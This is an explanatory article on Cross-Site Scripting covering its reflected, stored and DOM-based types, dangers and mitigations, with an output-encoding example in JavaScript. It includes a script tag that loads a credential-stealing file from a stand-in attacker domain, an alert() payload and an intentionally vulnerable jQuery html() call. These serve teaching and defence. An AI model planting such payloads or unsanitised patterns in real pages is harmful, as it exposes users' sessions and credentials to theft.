Cross Site Scripting (XSS)

Introduction

 
In this article, we are going to learn about Cross-Site Scripting, commonly abbreviated XSS, which has become one of the most common web application attacks in recent years. Cross-Site Scripting is listed seventh on the OWASP Top Ten of 2017. We will look at its definition and its different types, and finally at how to mitigate XSS.
 

What is Cross-Site Scripting (XSS)?

 
Cross-Site Scripting involves injecting malicious client-side scripts into a web page that is then delivered to an unsuspecting end user. The attacker takes advantage of unvalidated user input fields to send malicious scripts which may end up compromising the website or web application.
 
Once these malicious scripts are executed, they may be used to access session tokens or sensitive information such as passwords stored by the browser. In some cases, attackers may use these malicious scripts to rewrite HTML pages and manipulate unsuspecting users.
 

Types of Cross-Site Scripting (XSS)

 
XSS has three main types, namely:
  • Reflected XSS
  • Stored XSS
  • DOM-Based XSS
Reflected XSS
 
Reflected XSS refers to malicious scripts that are carried in the current HTTP request and echoed back in the response. These may come in the form of enticing links on websites that attract unsuspecting users to open the link. The moment a user clicks the link, the attacker gains access to the user’s session token, passwords, or any other sensitive information the script is written to collect, without the user’s knowledge. Reflected XSS only affects those users who have clicked the dangerous link.
 
Stored XSS
 
Unlike a Reflected attack, a Stored XSS attack resides on a web page of the compromised website or web application, and every time users visit the page the attacker may gain access to any information stored in their browser. For example, an attacker may realize that HTML tags can be embedded in the comments section of a web page:
 
<script src="http://evildoersssite.com/authstealer.js"> </script>
 
Once the attacker stores this malicious script in the comments section, every user who visits that particular page is exposed to the attack, even if they never post a comment themselves.
 
DOM XSS
 
The XSS attacks described above have something in common: the web page with embedded malicious scripts is formed on the server-side. However, the client frameworks used in modern web applications allow changing a web page without accessing the server. The document object model (DOM) can be modified directly on the client-side.
 
The main premise behind this vulnerability remains the same: poorly implemented processing of HTML escape sequences. This leads to attacker-controlled JavaScript appearing in the text of a web page, where it is executed in the context of the vulnerable site, posing harm to unsuspecting users.
 
Example
 
<div id="warning-text">This is a warning alert</div>
 
The HTML code has an element with the identifier "warning-text", which is used to display the text of a message. The page updates this element through the DOM tree with a JavaScript (jQuery) function:
 
function warning(msg) {
  // html() inserts msg as raw HTML, so any markup in msg is rendered rather than escaped
  $("#warning-text").html(msg);
  // make the surrounding message container (id "msg", not shown in the HTML above) visible
  $("#msg").prop('style', 'display:inherit');
}
 
The script displays the message with the html() function, which inserts its argument as raw HTML without sanitizing HTML escape sequences. Such an implementation is vulnerable if a malicious script is passed to the function:
 
<script>alert("Evildoer")</script>
 
In this case, the malicious script will be executed in the context of the vulnerable website, compromising the web page for every user who receives it.
 

Cross-Site Scripting Possible Dangers

  • Identity theft
  • The attacker can access the user’s permissions on the web application or website
  • The attacker has access to the user’s login credentials
  • The attacker may virtually deface the website
  • The attacker may plant Trojan Horse functionality on the website

How to mitigate XSS

 
Some of the methods to effectively prevent XSS vulnerabilities include:
  • Strictly filter user input as soon as it is received and cross-check the input supplied by the user against the expected input.
  • Encode all output data to prevent it from being interpreted as active content, using a combination of HTML, URL, JavaScript, and CSS encoding appropriate to the context where the data is placed.
  • To avoid execution of unintended scripts in HTTP responses, define the Content-Type and X-Content-Type-Options headers so that the browser interprets the response correctly.
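As an added example (not code from the original article), the following Node.js snippet shows the output-encoding mitigation applied to the DOM XSS case from the "Example" section: a raw rendering of the warning message, as jQuery's html() does, beside an encoded rendering. The element id and the sample messages are taken from the article; everything else is assumed.

```javascript
// Map every character that can change HTML structure to its entity form.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
  '/': '&#x2F;',
};

// Encode a string for insertion into an HTML element body or attribute value.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'\/]/g, (ch) => HTML_ENTITIES[ch]);
}

// What the article's warning(msg) effectively produces: msg is dropped into
// the markup unchanged, so any tags it contains become part of the page.
function renderWarningUnsafe(msg) {
  return `<div id="warning-text">${msg}</div>`;
}

// Hardened version: the message is treated as data, so tags in it are shown
// as visible text instead of being parsed and executed.
function renderWarning(msg) {
  return `<div id="warning-text">${escapeHtml(msg)}</div>`;
}

// Detection helper: does the rendered markup still contain a live <script> tag?
function containsScriptTag(markup) {
  return /<script\b/i.test(markup);
}

// Constructed inputs: a benign message plus the article's two payloads.
const SAMPLES = [
  'Your session will expire in 5 minutes',
  '<script>alert("Evildoer")</script>',
  '<script src="http://evildoersssite.com/authstealer.js"> </script>',
];

for (const msg of SAMPLES) {
  const unsafe = renderWarningUnsafe(msg);
  const safe = renderWarning(msg);
  console.log(`raw    ${containsScriptTag(unsafe) ? 'UNSAFE' : 'safe'}: ${unsafe}`);
  console.log(`encoded ${containsScriptTag(safe) ? 'UNSAFE' : 'safe'}: ${safe}`);
}
```

The encoder covers the HTML element and attribute contexts only; a value placed inside a JavaScript string, a URL or a CSS rule needs the encoding for that context instead.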

Conclusion

 
The impact of Cross-Site Scripting is very serious because, in most of its forms, it targets unsuspecting users, who might end up losing money or filing lawsuits against the affected organization, thereby damaging the organization's reputation as well as harming its clients.